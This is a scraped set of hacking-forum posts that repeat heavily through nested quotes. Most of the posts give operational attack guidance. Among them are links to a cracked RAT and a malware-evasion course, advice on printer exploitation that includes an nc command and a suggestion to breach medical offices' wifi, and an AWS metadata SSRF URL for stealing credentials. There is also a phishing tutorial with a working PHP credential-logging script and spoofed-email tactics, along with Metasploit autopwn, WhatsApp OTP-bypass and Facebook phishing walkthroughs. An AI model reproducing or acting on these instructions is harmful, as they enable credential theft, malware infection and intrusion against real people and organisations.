10 Machine ?? How to Encrypt the Payload to Avoid Detection ?? Discover How Hackers Take Control of Webcams Modify Documents and Much More  ?? Source Link :-   download link : https://mega.nz/folder/ojpmlCCZ#8CR38iGbIBPDryl7krVYZQ >undetectable malware >veil evasion tool + metasploit  sorry mate but I need to stop you right there veil evasion is clearly not enough to evade security programs let alone combined with metasploit that has probably been reversed many times since it was created. Author :- Nikhil Parekh  Requirements ?? Open Mind and Willingness to Implement ?? Notebook or Journal to Take Lots of Notes  Course Content ?? Understand What Undetectable Malware is ?? Learn How to Install Python and Pip ?? Install the Veil Framework ?? Understand the Gnome Desktop ?? Install Wine Mono ?? Learn How to Install Metasploit ?? Test the MSF Console ?? Create an Exploit with Veil ?? Test the Exploit on a Windows 10 Machine ?? How to Encrypt the Payload to Avoid Detection ?? Discover How Hackers Take Control of Webcams Modify Documents and Much More  ?? Source Link :-   download link : https://mega.nz/folder/ojpmlCCZ#8CR38iGbIBPDryl7krVYZQ"
Hello  Today I want to share a cracked RAT (I didnt crack it so beaware of virus). Always run it in VM.  To use it execute mirai exe file and then build the exe file and then send it to the victims when they execute the file they will be infected and will appear in your list  Thank  _E...Cracked_7z
(07-17-2020 07:46 PM)k33l4 Wrote: Any resources would be helpful thanks. What type of malware are you looking to develop? Any resources would be helpful thanks. (07-19-2020 08:36 AM)Funshine Wrote:  (07-19-2020 06:34 AM)k33l4 Wrote: I would prefer to learn rather than buying it from someone. I know its 2020 but i would rather increase my attack surface combining with some other techinques of my own. For sure. C/C++ is where you want to focus your efforts then.  Github has some code on their to help you see other people^s work and improve on when you^re ready. For now stick with the learning the basics of C/C++ and improving from there.   There are many online courses books and YouTube you can start at. thanks (07-19-2020 06:34 AM)k33l4 Wrote: I would prefer to learn rather than buying it from someone. I know its 2020 but i would rather increase my attack surface combining with some other techinques of my own. For sure. C/C++ is where you want to focus your efforts then.  Github has some code on their to help you see other people^s work and improve on when you^re ready. For now stick with the learning the basics of C/C++ and improving from there.   There are many online courses books and YouTube you can start at. (07-18-2020 11:55 PM)Funshine Wrote:  (07-17-2020 07:46 PM)k33l4 Wrote: primary focus on cryptojacking and ransomware Well then stick with C/C++ to create your own madness. Check Github as there are so many open source malware these days to learn from.   I^d recommend skipping that whole step and purchasing ransomware from @Nosophoros who is a vendor here.   ...ded-future  It^s 2020 dude by the time you learn it from the ground up we^ll all be dead and it^ll be old news.  Level up partner.I would prefer to learn rather than buying it from someone. I know its 2020 but i would rather increase my attack surface combining with some other techinques of my own. (07-17-2020 07:46 PM)k33l4 Wrote: primary focus on cryptojacking and ransomware Well then stick with C/C++ to create your own madness. Check Github as there are so many open source malware these days to learn from.   I^d recommend skipping that whole step and purchasing ransomware from @Nosophoros who is a vendor here.   ...ded-future  It^s 2020 dude by the time you learn it from the ground up we^ll all be dead and it^ll be old news.  Level up partner. [/quote]  What type of malware are you looking to develop? [/quote] primary focus on cryptojacking and ransomware
"(12-31-2019 12:25 AM)evan69 Wrote:  (12-17-2019 10:08 PM)sploiter Wrote: Hello  I am currently interested in exploiting a Cannon ImageRunner commercial printer used in enterprise situations. Many such printers are connected to queue systems and paper management systems. For example PaperCut MF.  Given a printer like this connected to a paper management system like PaperCut MF how can I exploit and gain access to see all printed documents?  Thanks in advance. sploiter I^m not an expert but this question was interesting. PaperCut MF is surprisingly well documented let^s see what we can do. Thanks to some college public wiki related to PaperCut and readings we know that : - it^s tcp only - it could be exposed online with a feature called WebPrint by default on 9192/tcp(https) and 9191(http). - a pretty unauthenticated rce in version   Others ports can be used list here :  https://www.   With port 9192 open let^s try to discover a bit more. Sometimes sysadmin can be lazy we can find an outdated PaperCut web interface. Anyway this is similar to how i would try to do it  do we know if there any public-facing web pages for controlling printer on any open ports? this way we can use the web exploitation techniques to try and exploit them  even default credentials etc. but yeah check for open ports. try shodan too if there is public-facing ports then someone can find a live printer with shodan and post it here so we can try to exploit it Yes trying on exposed printer will be interesting. Look for 9100/tcp or 9101 aka RAW to find it. Also there is a lot of exposed WebPrint from PaperCut exposed online mostly .edu (12-17-2019 10:08 PM)sploiter Wrote: Hello  I am currently interested in exploiting a Cannon ImageRunner commercial printer used in enterprise situations. Many such printers are connected to queue systems and paper management systems. For example PaperCut MF.  Given a printer like this connected to a paper management system like PaperCut MF how can I exploit and gain access to see all printed documents?  Thanks in advance. sploiter I^m not an expert but this question was interesting. PaperCut MF is surprisingly well documented let^s see what we can do. There is an official white paper about security maybe some interesting findings (https:// www. papercut .com/kb/Main/SecurityWhitepaper)  Thanks to some college public wiki related to PaperCut and readings we know that:  - it^s tcp only - it could be exposed online with a feature called WebPrint by default on 9192/tcp(https) and 9191(http). - some unspecified vulns with no poc in 2019 and 2014  Others ports can be used list here :  https://www.   With port 9192 open we may find an outdated PaperCut web interface workings default logs or maybe some vulns to gain admin access and see all printed documents. PaperCut log everything but confidentiality settings can allow user to see only their printed job history.  It will be pretty useful to get a shell ideally in the printers subnet  There is plenty of attacks on http:// hacking-printers. net/wiki/index.php/Main_Page Some of them must be outdated but there are some papers relatives to network printers. I^ll probably check these to familiarize myself.  2017 SoK: Exploiting Network Printers (PDF) by Jens M?ller Juraj Somorovsky Vladislav Mladenov  2016 Exploiting Network Printers: A Survey of Security Flaws in Laser Printers and Multi-Function Devices (PDF) by Jens M?ller Juraj Somorovsky Vladislav Mladenov Proof-of-concept code   If we have a shell and the printers ip we can try this tool available on github ""PRET - Printer Exploitation Toolkit"" which allow us to interact directly with the printers using it language (PostScript PJL and PCL)  https://    It^s possible to interact directly with the printer using nc on port 9100(used by PaperCut) a password can be required.  nc -v -v <printer ip> 9100  From here using PJC command you would be able to download all jobs the canon is receiving.  Good luck with this printer story Hello  I am currently interested in exploiting a Cannon ImageRunner commercial printer used in enterprise situations. Many such printers are connected to queue systems and paper management systems. For example PaperCut MF.  Given a printer like this connected to a paper management system like PaperCut MF how can I exploit and gain access to see all printed documents?  Thanks in advance. sploiter (12-31-2019 12:25 AM)evan69 Wrote:  (12-17-2019 10:08 PM)sploiter Wrote: Hello  I am currently interested in exploiting a Cannon ImageRunner commercial printer used in enterprise situations. Many such printers are connected to queue systems and paper management systems. For example PaperCut MF.  Given a printer like this connected to a paper management system like PaperCut MF how can I exploit and gain access to see all printed documents?  Thanks in advance. sploiter I^m not an expert but this question was interesting. PaperCut MF is surprisingly well documented let^s see what we can do. There is an official white paper about security maybe some interesting findings (https:// www. papercut .com/kb/Main/SecurityWhitepaper)  Thanks to some college public wiki related to PaperCut and readings we know that:  - it^s tcp only - it could be exposed online with a feature called WebPrint by default on 9192/tcp(https) and 9191(http). - some unspecified vulns with no poc in 2019 and 2014  Others ports can be used list here :  https://www.   With port 9192 open we may find an outdated PaperCut web interface workings default logs or maybe some vulns to gain admin access and see all printed documents. PaperCut log everything but confidentiality settings can allow user to see only their printed job history.  It will be pretty useful to get a shell ideally in the printers subnet  There is plenty of attacks on http:// hacking-printers. net/wiki/index.php/Main_Page Some of them must be outdated but there are some papers relatives to network printers. I^ll probably check these to familiarize myself.  2017 SoK: Exploiting Network Printers (PDF) by Jens M?ller Juraj Somorovsky Vladislav Mladenov  2016 Exploiting Network Printers: A Survey of Security Flaws in Laser Printers and Multi-Function Devices (PDF) by Jens M?ller Juraj Somorovsky Vladislav Mladenov Proof-of-concept code   If we have a shell and the printers ip we can try this tool available on github ""PRET - Printer Exploitation Toolkit"" which allow us to interact directly with the printers using it language (PostScript PJL and PCL)  https://    It^s possible to interact directly with the printer using nc on port 9100(used by PaperCut) a password can be required.  nc -v -v <printer ip> 9100  From here using PJC command you would be able to download all jobs the canon is receiving.  Good luck with this printer story GREAT summary I have has many success with PERT I^ve had open FTP on dozens of printers some as much as 6 months (01-11-2020 07:05 AM)yellowpapergrease Wrote:  (12-31-2019 12:25 AM)evan69 Wrote:  (12-17-2019 10:08 PM)sploiter Wrote: Hello  I am currently interested in exploiting a Cannon ImageRunner commercial printer used in enterprise situations. Many such printers are connected to queue systems and paper management systems. For example PaperCut MF.  Given a printer like this connected to a paper management system like PaperCut MF how can I exploit and gain access to see all printed documents?  Thanks in advance. sploiter I^m not an expert but this question was interesting. PaperCut MF is surprisingly well documented let^s see what we can do. There is an official white paper about security maybe some interesting findings (https:// www. papercut .com/kb/Main/SecurityWhitepaper)  Thanks to some college public wiki related to PaperCut and readings we know that:  - it^s tcp only - it could be exposed online with a feature called WebPrint by default on 9192/tcp(https) and 9191(http). - some unspecified vulns with no poc in 2019 and 2014  Others ports can be used list here :  https://www.   With port 9192 open we may find an outdated PaperCut web interface workings default logs or maybe some vulns to gain admin access and see all printed documents. PaperCut log everything but confidentiality settings can allow user to see only their printed job history.  It will be pretty useful to get a shell ideally in the printers subnet  There is plenty of attacks on http:// hacking-printers. net/wiki/index.php/Main_Page Some of them must be outdated but there are some papers relatives to network printers. I^ll probably check these to familiarize myself.  2017 SoK: Exploiting Network Printers (PDF) by Jens M?ller Juraj Somorovsky Vladislav Mladenov  2016 Exploiting Network Printers: A Survey of Security Flaws in Laser Printers and Multi-Function Devices (PDF) by Jens M?ller Juraj Somorovsky Vladislav Mladenov Proof-of-concept code   If we have a shell and the printers ip we can try this tool available on github ""PRET - Printer Exploitation Toolkit"" which allow us to interact directly with the printers using it language (PostScript PJL and PCL)  https://    It^s possible to interact directly with the printer using nc on port 9100(used by PaperCut) a password can be required.  nc -v -v <printer ip> 9100  From here using PJC command you would be able to download all jobs the canon is receiving.  Good luck with this printer story GREAT summary I have has many success with PERT I^ve had open FTP on dozens of printers some as much as 6 months Thanks it^s nice to know this tool works great. Do u have some advices to get started? (12-31-2019 12:25 AM)evan69 Wrote: If we have a shell and the printers ip we can try this tool available on github ""PRET - Printer Exploitation Toolkit"" which allow us to interact directly with the printers using it language (PostScript PJL and PCL)  https://    It^s possible to interact directly with the printer using nc on port 9100(used by PaperCut) a password can be required.  nc -v -v <printer ip> 9100 Thanks for sharing the repo and the nice summary. The tool looks awesome I have neglected printers as targets for attacks for way to long time to do some reading Oh man this brings me back. My first ever (many years ago) exploit was a very old HP DirectJet. I was so frustrated when it didn^t work the first time but needless to say with some tinkering I got it to work. (01-14-2020 08:02 PM)evan69 Wrote:  (01-11-2020 07:05 AM)yellowpapergrease Wrote:  (12-31-2019 12:25 AM)evan69 Wrote:  (12-17-2019 10:08 PM)sploiter Wrote: Hello  I am currently interested in exploiting a Cannon ImageRunner commercial printer used in enterprise situations. Many such printers are connected to queue systems and paper management systems. For example PaperCut MF.  Given a printer like this connected to a paper management system like PaperCut MF how can I exploit and gain access to see all printed documents?  Thanks in advance. sploiter I^m not an expert but this question was interesting. PaperCut MF is surprisingly well documented let^s see what we can do. There is an official white paper about security maybe some interesting findings (https:// www. papercut .com/kb/Main/SecurityWhitepaper)  Thanks to some college public wiki related to PaperCut and readings we know that:  - it^s tcp only - it could be exposed online with a feature called WebPrint by default on 9192/tcp(https) and 9191(http). - some unspecified vulns with no poc in 2019 and 2014  Others ports can be used list here :  https://www.   With port 9192 open we may find an outdated PaperCut web interface workings default logs or maybe some vulns to gain admin access and see all printed documents. PaperCut log everything but confidentiality settings can allow user to see only their printed job history.  It will be pretty useful to get a shell ideally in the printers subnet  There is plenty of attacks on http:// hacking-printers. net/wiki/index.php/Main_Page Some of them must be outdated but there are some papers relatives to network printers. I^ll probably check these to familiarize myself.  2017 SoK: Exploiting Network Printers (PDF) by Jens M?ller Juraj Somorovsky Vladislav Mladenov  2016 Exploiting Network Printers: A Survey of Security Flaws in Laser Printers and Multi-Function Devices (PDF) by Jens M?ller Juraj Somorovsky Vladislav Mladenov Proof-of-concept code   If we have a shell and the printers ip we can try this tool available on github ""PRET - Printer Exploitation Toolkit"" which allow us to interact directly with the printers using it language (PostScript PJL and PCL)  https://    It^s possible to interact directly with the printer using nc on port 9100(used by PaperCut) a password can be required.  nc -v -v <printer ip> 9100  From here using PJC command you would be able to download all jobs the canon is receiving.  Good luck with this printer story GREAT summary I have has many success with PERT I^ve had open FTP on dozens of printers some as much as 6 months Thanks it^s nice to know this tool works great. Do u have some advices to get started? Get a decent dedicated server and start scanning on printer ports then brush up on the documentation for PERT and if you^re serious make a script to scan the list of your found open ports otherwise just start testing printers with open ports  Go to important places like doctors offices and the likes and connect to their wifi in the waiting room or just breach it and then exploit the printer locally tons of high value data (12-17-2019 10:08 PM)sploiter Wrote: Hello  I am currently interested in exploiting a Cannon ImageRunner commercial printer used in enterprise situations. Many such printers are connected to queue systems and paper management systems. For example PaperCut MF.  Given a printer like this connected to a paper management system like PaperCut MF how can I exploit and gain access to see all printed documents?  Thanks in advance. sploiter This is interesting. Based on your question I assume that printers store information pertaining to documents it has printed? Does it actually maintain the image/contents of a printed item or just the printing task?   Gaining access to the rest of the network/other printers seems possible. As well as any information related to users sending tasks to said printer.   Good luck on achieving your goal."
He is completely wrong. I^ve hacked lots of AWS servers. They are at times even easier to hack. Any SSRF vulnerability would instantly result in a credential leak by pointing it to a page like this (and reading the value on the page):  http://169.254.169.254/latest/meta-data/...s-ec2-role  No website is impossible to hack. That is obvious. Furthermore  is built using Wordpress. Not sure if that is the same company though.  I^m confused how a secure login page can completely secure a website though. Maybe he has secured against CSRF and have a CSP to prevent any XSS attacks but that^s not going to protect him against the important vulnerabilities which will result in his server getting pwned. Hi  This is going to seem like a stupid question but here goes.  I met a bit of an a**hole over Christmas who is involved with a company called Pimberly. I am in eCommerce and he was trying to sell me their ^solution^ whilst also being a general d*** head.  Anyway we got onto the subject of security and I mentioned that I believe any site or IT system can be hacked given the right skills access and time.  His answer was to shout me down trying to embarrass me in front of everyone there he said that because the log in page (https://pimber.ly) and the whole system was on AWS it was unhackable.  Please tell me he is wrong.  Thanks NOS
"Thank you for this very useful thanks you advise of continue learning js and php sql  i hope to reply me it is basic to be first web developer  befor gaining the hacking skills ?? (11-11-2019 12:00 PM)gaber Wrote: thanks you advise of continue learning js and php sql  i hope to reply me it is basic to be first web developer  befor gaining the hacking skills ?? If you are looking for what to learn before the ""hacking activities"" learn the protocol HTTP HTTPS learn SQL and how its supposed to work and why SQLi works. Knowing how the protocol/technology works will help you figure a lot of things out. For example if you know how cookies work you will understand why CSRF works. (Just a quick example simplified but you get the point).  Also learning HTTP and HTTPS protocol will teach you different parts of the protocol you can use in an attack. Such as HTTP Headers (Learn what they are used for and how they are supposed to be used) cookies Forms JS and other HTML building blocks. There is A LOT TO LEARN.   In a nutshell Learn as much as you can on ""how the target is suppose to work"" normally. Then try to break it change values add special characters known error inducing strings/payloads (look on github) etc. Errors CAN indicate exploitable conditions so when attacking a web app and you have no information or experience first step is to induce errors from the web app. Do something to make the web server return errors and error messages. Make assumptions using any information gathered from the error messages or server behavior. Attack again repeat.  If you have any specific questions i could elaborate more I^m going to keep this brief but web exploitation is a skill I have been practicing for a little over a decade now. The world of web exploitation has changed a lot since then but the same fundamental principles still exist.  There^s a lot of obstacles on the route to learning how to hack a website. There are some quick and easy tools which are available that will allow you to ^hack a website^ but don^t you think everyone else has already tried these on other sites? When hacking a website you^re not just competing with the security team working behind the scenes but also against other hackers. If hacking a website was obvious someone would have likely already done it before you.  This is where the secrecy of web hacking comes into play and it^s really one of the reasons why it^s so hard to get started in this area. Most good hackers are good because they keep their methods private they know what makes them stand out from everyone and can use that to attack a high profile target. Really what it comes down to is locating promising endpoints testing them using a variety of techniques to see if specific attack vectors are possible trying to bypass any additional security measures firewalls or similar defense systems which may be in place and finally extracting the data/executing the payload both securely and stealthily. It^s something that^s hard to do right and it takes a lot of time and skill to master. You have to be very careful if you^re doing this as a blackhat.  Getting Started  To get started lets avoid using tools. You should start by selecting a simple vulnerability class to practice. I would recommend XSS or SQL injection for a beginner as they^re both relatively simple concepts and pretty common although virtually every hacker knows about them so finding them on high profile targets is pretty uncommon. I^m not going to write the steps on how to become a good hacker from beginning to end because it^s a process which takes years and I don^t want to overload people with information. It will take a long time but rest assured I need not explain it to you right now. Once you get started you will know where to go from there and will understand it better. It^s just getting started that is hard.  Here is a simple list of different vulnerability classes and what kind of programming languages/knowledge of concepts you will need to understand them (yes you need to be able to code if you want to hack despite what 99% of whitehats and script kids will tell you):  1. XSS - Requires a knowledge of client-side languages. Basic javascript knowledge for building advanced payloads knowledge of event handlers/HTML. CSS can come in surprisingly useful also but certainly not needed. PHP or another server-side language is always useful for bypassing filters too.  2. SQL Injection - Requires SQL knowledge for building the payloads. Also server-side languages such as PHP in order to bypass filters and understand how the queries are being generated.  3. Server-Side Request Forgery - Knowledge of requests linux and common applications. SSRF is usually in the blind so you will need to be able to try and generated advanced payloads based on the system. Understanding the underlying OS/distribution is very important here too. SSRF is entirely about request methods (GET/POST/PUT/DELETE/etc) but primarily GET. You need to know how servers interact etc. There are some more advanced concepts too but you do not need them to get started.  4. External XML Entities - XXE requires XML knowledge in order to build payloads. Understanding how web applications accept XML as input is also very important.  5. Server-Side Template Injection - Covers a wide array of languages which use templates. Knowing the templates to test for is important recon should tell you what programming language is running server-side so just use that to figure out what templates are being used.  6. Cross-Site Request Forgery - Requires knowledge of request methods (GET/POST/PUT/DELETE/etc) and also javascript/html to create payloads. Furthermore it^s useful to have knowledge of server-side language (PHP) to know how they accept the request and if it have a csrf token.  7. IDOR/Access Control and others vulnerabilities - these note require much knowledge but they time to test.  All above issue require you understand how read raw request so might be very good exercise to start with and get better from there on.  good luck ask any question below if you have and i try answer it (09-18-2019 03:37 PM)Power Wrote: I^m going to keep this brief but web exploitation is a skill I have been practicing for a little over a decade now. The world of web exploitation has changed a lot since then but the same fundamental principles still exist.  There^s a lot of obstacles on the route to learning how to hack a website. There are some quick and easy tools which are available that will allow you to ^hack a website^ but don^t you think everyone else has already tried these on other sites? When hacking a website you^re not just competing with the security team working behind the scenes but also against other hackers. If hacking a website was obvious someone would have likely already done it before you.  This is where the secrecy of web hacking comes into play and it^s really one of the reasons why it^s so hard to get started in this area. Most good hackers are good because they keep their methods private they know what makes them stand out from everyone and can use that to attack a high profile target. Really what it comes down to is locating promising endpoints testing them using a variety of techniques to see if specific attack vectors are possible trying to bypass any additional security measures firewalls or similar defense systems which may be in place and finally extracting the data/executing the payload both securely and stealthily. It^s something that^s hard to do right and it takes a lot of time and skill to master. You have to be very careful if you^re doing this as a blackhat.  Getting Started  To get started lets avoid using tools. You should start by selecting a simple vulnerability class to practice. I would recommend XSS or SQL injection for a beginner as they^re both relatively simple concepts and pretty common although virtually every hacker knows about them so finding them on high profile targets is pretty uncommon. I^m not going to write the steps on how to become a good hacker from beginning to end because it^s a process which takes years and I don^t want to overload people with information. It will take a long time but rest assured I need not explain it to you right now. Once you get started you will know where to go from there and will understand it better. It^s just getting started that is hard.  Here is a simple list of different vulnerability classes and what kind of programming languages/knowledge of concepts you will need to understand them (yes you need to be able to code if you want to hack despite what 99% of whitehats and script kids will tell you):  1. XSS - Requires a knowledge of client-side languages. Basic javascript knowledge for building advanced payloads knowledge of event handlers/HTML. CSS can come in surprisingly useful also but certainly not needed. PHP or another server-side language is always useful for bypassing filters too.  2. SQL Injection - Requires SQL knowledge for building the payloads. Also server-side languages such as PHP in order to bypass filters and understand how the queries are being generated.  3. Server-Side Request Forgery - Knowledge of requests linux and common applications. SSRF is usually in the blind so you will need to be able to try and generated advanced payloads based on the system. Understanding the underlying OS/distribution is very important here too. SSRF is entirely about request methods (GET/POST/PUT/DELETE/etc) but primarily GET. You need to know how servers interact etc. There are some more advanced concepts too but you do not need them to get started.  4. External XML Entities - XXE requires XML knowledge in order to build payloads. Understanding how web applications accept XML as input is also very important.  5. Server-Side Template Injection - Covers a wide array of languages which use templates. Knowing the templates to test for is important recon should tell you what programming language is running server-side so just use that to figure out what templates are being used.  6. Cross-Site Request Forgery - Requires knowledge of request methods (GET/POST/PUT/DELETE/etc) and also javascript/html to create payloads. Furthermore it^s useful to have knowledge of server-side language (PHP) to know how they accept the request and if it have a csrf token.  7. IDOR/Access Control and others vulnerabilities - these note require much knowledge but they time to test.  All above issue require you understand how read raw request so might be very good exercise to start with and get better from there on.  good luck ask any question below if you have and i try answer it Nice and most helpful post. Thanks admin. This was very informative admin.  Thank you for sharing to everyone. This is why I would like to join this site. Because you care enough to take the time to teach someone who isn^t as knowledgeable as you are. That^s how the world *should* work.  I hope to provide similar value someday.   Cheers Suggested basic tools to get familiar with: - OWASP Zap - Burp (portswigger) -> try writing own extension - dirbuster  From there start building a knowledge base of technologies you want to hack. Mindmaps can help structuring you knowledge.   Example structure: WebFramework - default credentials - vulnerable plugins - admin logins - common misconfigurations - known cve^s  Then map the web application you want to hack. Check every navigation path for more complex functions. Most scanners are too stupid to hack these function properly. Examples: - multi step order in shops - contact forms - file uploads - a.s.o  If you have to much money check ."
Hey everyone i^d like to share valuable resoure(s) for learning web exploitation   [+] Why is this important?  Well as application side of things are getting really popular in 2019 it is almost necessary to learn some basics of web exploitation just so you know about it if you ever need it. which you will.  [+] Sources:  1. OWASP Juice Shop  This one is really good and you can tell its good because it was even made by OWASP themselves I highly recommend this if you already have more experience in web exploitation and just want to tinker around in a vulnerable environment where really anything can be exploited You can get this one at : .php/OWASP_Ju...op_Project  2. BWAPP This one is an absolute goldmine It has so many web vulnerabilities you can exploit and learn from this is my go-to source for learning anything? You can get this at:   3. DVWA  Damn Vulnerable Web Application is super basic but also good for people who are just starting out It doesn^t have many vulnerabilties like both of them but doesn^t overwhelm you and makes beginners feel calm.. in a way? You can get DVWA at: http://www.dvwa.co.uk/ Although this one takes some setting up you can search up how to do it or i might even make a thread on how to do it yourself if i get that many requests. Thanks everyone Peace out  [+] Credits  So i want to give credit to the admin for making this post : .php?tid=969 as he was the one who originally inspired me to do this so thanks
Here^s one more that shows many examples of common exploits:  Note - I did not personally review every link in this. I checked a few and found them interesting enough to share. Please take caution in clicking random links from strangers.    Awesome resource to find information on a target using publicly available resources.       github:  Here is a list of awesome resources to learn more about hacking and computer science. Enjoy   List of Awesome Resources:  ---------------------------------------------  Sytem Adminstration ...-knowledge ** This is a good one **    (free) University Comp Sci Courses   Penetration Testing   Windows Tools:   Hacking Resources:    Application Scalability   Javascript .git  Machine Learning ...e-learning  The Ultimate Privacy Guide ...vacy-guide I gave it a quick look and it looks pretty good. Thanks. Thank you man this is really cool directory.. Tagged.
Hey  I have my Project Serversdown (ATTENTION: CLEARNET )  I^m currently working on the new Version and I would really appreciate to hear your criticism at the code and I would also appreciate if someone would want to work with me and develop it further.  On the next Versions I would add more Denial of Service attack options and run them in parallel and so one.  Thanks  Hacker5preme
I am learning RAT development now. I wanted to use QuasarRAT so I downloaded it from github  But I can^t build with release mode it required certificate How can I use QuasarRAT? Should I buy certificate for it? Is it not free open source? (09-02-2019 12:20 PM)agenboetory7 Wrote: I am learning RAT development now. I wanted to use QuasarRAT so I downloaded it from github  But I can^t build with release mode it required certificate How can I use QuasarRAT? Should I buy certificate for it? Did you restore the nugget packages? I know is something silly but some people forget that hehe. you should not use .NET malwares because them are easily reversable.
"that was helpful can we chat privately? Basic Phishing tutorialToday I will write for something very powerful in hacking phishing this is the one of the most illegal techniques in hacking. I^m not responsible for your actions I write this for education purpose only if you get in to trouble I^m not responsible  Phishing is highly illegal so if you are new to hacking I will recommend first to do other stuff like RATing and keylogging then phishing.  When you are phishing you have to highly protect your self.  First you need to sing up in very secure hosting. That won^t get you in trouble I can^t recommend you but after short search on internet I found some. Code: cwahi -      110mb -      Ripway -      SuperFreeHost - http://superfreehost.info     Freehostia -      Freeweb7 -      t35 -      Awardspace -      PHPNet - http://phpnet.us     Free Web Hosting Pro -      ProHosts -      FreeZoka -      000webhost -      AtSpace - I can^t assure that those hosting are secure and there aren^t Federals  Those are free hostings. I haven^t found paid but I thing that they are more secure. So when you have found hosting its time to create phishing pages.  Let^s say you have target Paypal (I won^t recommend to target it when you don^t have experience ) you will need login from there to get them there are 2 ways. 1.To use tool called Phish Creator - ?v=xoTHvHQsroA  I don^t know is it backdoored or not. For linux users - ?v=C_lFkiOYy...re=related  2.To do it manually. Ok go to Paypal login page(in our case if you are going to phish Facebooks go to Facebook login page) and save it.  Now you should create script that will record all variable write in the page I can^t help you here.  kidding open editor(notepad for example) and write this script. Code:<?php header(""Location: "") $handle = fopen(""accs.txt"" ""a"") foreach($_GET as $variable => $value) { fwrite($handle $variable) fwrite($handle ""="") fwrite($handle $value) fwrite($handle ""\r\n"") } fwrite($handle ""\r\n"") fclose($handle) exit ?> Paste this and edit where is needed then save this will save all accs to accs.txt. Now you should link this page to the save you have save earlier. Open saved login page with editor and find ""action="" and change it with page you have create(copy). example Code:action=""?cmd=_login-submit&dispatch=5885d80a13c0db1f8e263663d3faee8d0b7e678a25d883d0bcf119ae9b66ba33""will become Code:action=""""What you just did is to call your own script when the user submit its form using the action command in html so now you have the password and the user is redirected to original page. You are ready now its time to start spreading your link . I^m not the best in this section but I can help . E-mail Spam - This is highly illegal too. But in our case we attack paypal so lets spoof the email to paypal admins and send email in which we say that there is update to the system and they need to enter their information again. - Belive or not this is very effective way."
Sir This link is expired can i get new one.Please What you??ll learn: 80+ detailed videos on ADVANCED network hacking. 2 methods to hack WPA2 enterprise networks. 3 methods to hack captive portals (hotels & airport networks). Steal WPA/WPA2 password using evil twin attack. Crack WPA/WPA2 faster using GPU. Write custom scripts to implement your attack ideas. Bypass router-side security & run ARP spoofing attack without raising alarms. Unlock WPS on some routers even if its locked. Disconnect multiple or all clients from their networks without knowing the key. Bypass MAC filtering (both black & white lists). Discover & connect to hidden networks. Crack more secure WEP implementation when SKA is used. Size: 1.52 GB Link:?id= ... x07lfWm8IF
here is the link for a website is got hacked using SQLMAP.php?cid=115easily use SQLMAP to get access to the database   Enjoy .
Owner: PNPeraFileType: ZipSize: 900MBModules: 6Download:  ... 5K5jr/view
I am here to show you this magical tool called Metasploit that allows you to hack ANYunpatched computer with only it^s IP. Lets begin...First you need to download Metasploit. The most up-to-date version is FREE at .You need PostgrSQL for your database. Download here: . Make sure you use all the defaults or Metasploit woun^t workNow lets get down to buisness... After installing both tools open up the PostgrSQL admin gui (start -> all programs -> PostgreSQL 9.0 -> pgAdmin III). Then right-click on your server (in the left hand box) and click connect. Remember to keep this window open the whole time. You will also need the pass you chose to use in step 5...Time for some hacking Go to start -> all programs -> Metasploit Framework and then open the Metasploit gui.Now in the window type:db_connect postgres:ThePassYouChose@localhost:5432The first time you do this you will see lots of text flash buy. Don^t wory this is normal.Type db_host to make sure you are connected correctally.Now type this:db_nmap 000.000.000.000Make sure you put the ip of the computer you are trying to hack in the place of 000.000.000.000...Now we get to the fun part the automatic exploitation. Just type db_autopwn -t -p -e -s -b  watch the auto-exploitation start go play Halo for a while and then come back...After the exploitation is done type sessions -l to see what the scanner found. If all went well you should see a list of exploits.Now we get to use the exploits to hack the computer If you will notice all of the exploits are numbered and they all have obvious names (i. e. reverseScreen_tcp). In order to use an exploit type this:sessions -i ExploitNumberFor this method you can see their screen controll their mouse see what they type see them etc Works only in Kali OS  can u give me any further explanation please ?
OTP Bypass InstructionsWhen victim enter his credentials you need to go to original website and use those credentials to send real OTP to victim. Once he enter that OTP such OTP will also be there with you and you will be allowed to login the account before him.whatsapp-phishingthe best tool for whatsapp-phishing with OTP Bypass Requirementsngrok setupRoot - MustApache ServerInternetadd repo on kaliHow to Intsall & Useroot ---must git clone .gitcd whatsapp-phishingchmod 777 Whatsapp.sh./Whatsapp.sh
HOW TO GET FRESH VALID PROXY LIST FOR CRACKING METHOD BY MAD HACKER [2K18]Method -- Go to - Then Select Proxies Archive From Menu - Now there You Can See Fresh Proxy Archive List Checked in The Last Few Minutes.- Select Any Archieve List And Hold For A Sec.- Now Enjoy You Can Get Working Checked Proxy List  Just Copy And Paste On Your Notepad
??Hacking Method ?? Welcome To The Hacking Tutorial. This Works Only In Active Accounts. 1) Open website  (It^s in spanish so you can open it in chrome so that you can translate it in any other language 2) Now click on three lines or you can say menu. 3) Click on how to hack. 4) Select any website you want to hack. This website can hack Twitter Facebook Instagram Snapchat G-Mail Yahoo or Hotmail. For all the websites the procedure is same. In this tutorial/video i will show on Facebook as it is in more demand. 5) So after clicking on facebook a page will be displayed in spanish and you can translate it in any language as i told you above. 6) In the first column click on ^^Generate Randomly^^ 7) In next column you can put the URL you want to redirect your victim after he/she puts his/her password. (It^s optional to fill this column You can leave it blank also) 8) The next column is also optional. In this you can put the username or email of the victim so that when he opens facebook he only needs to fill password. The email will be the same as you put on that column. If you don^t fill the column it^s okay as the victim can fill his username and password. 9) So after that in next column change the language to english so that the fake facebook page display in english. 10) Leave the next column undisturbed and click on the big green button where in this written create link. 11) After that a new tab will be made where it will be written in minimize milt.... Like something and you need to be on that page 10 seconds. 12) After that close the tab and open your previous tab. 13) In that tab you will see 2 links generated. 14) Send the first link which is a fake facebook page link to your victim and open the second link on your browser. 15) When the victim puts his password on the first link you can see the password on the second link on your browser by clicking on search data and waiting for 10 seconds as you previously did. 16) The password and username will be shown to you and you can enter that in real facebook app or website and open your victims id. *Please Note. If You Fall In Trouble Or Anything That^s Your Responsibility & Not mine*
